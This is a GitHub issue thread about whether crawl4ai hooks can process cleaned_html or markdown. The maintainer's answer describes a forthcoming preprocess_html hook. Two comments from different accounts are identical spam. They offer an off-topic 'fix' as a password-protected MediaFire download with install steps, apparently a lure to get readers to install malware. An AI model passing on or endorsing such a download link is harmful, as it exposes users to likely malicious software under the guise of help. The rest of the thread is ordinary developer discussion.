### ISSUE TITLE
Is it possible to access to cleaned_html or markdown for Hooks

### ISSUE THREAD

**Issue by takan1** [unclecode/crawl4ai#81]
I see that I can access `html` for `before_return_html` hook. However, I'd like to process cleaned_html or markdown in the hook instead. Is it possible? I specifically want to modify source data(use cleaned_html or markdown) for extraction strategy.

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by unclecode** [comment]
@takan1 Good idea! Right now, there's one trick, if you look at the `before_return_html` example, you must return the driver, which means you can manipulate, clone, and return it however you want. However, I'll add another hook, `preprocess_html`, where you can apply your final changes to the source before Crawl4Ai continues. This will be included in the next release.

**Comment by takan1** [comment]
@unclecode That's great, thanks :)

**Comment by unclecode** [comment]
@takan1 This already added to the new version, somewhere in next week, we will release ti.

**Comment by hbcondo** [comment]
> I'll add another hook, `preprocess_html`

Is anyone using the `preprocess_html` hook? Has it been added / released? It's not listed in the [docs](https://docs.crawl4ai.com/advanced/hooks-auth/).

**Comment by aravindkarnam** [comment]
@hbcondo No. It's not released yet. It's in the `next` branch. When it's released it will become default behaviour in JsonCssExtractionStrategy, so there would be no need to call it explicitly.
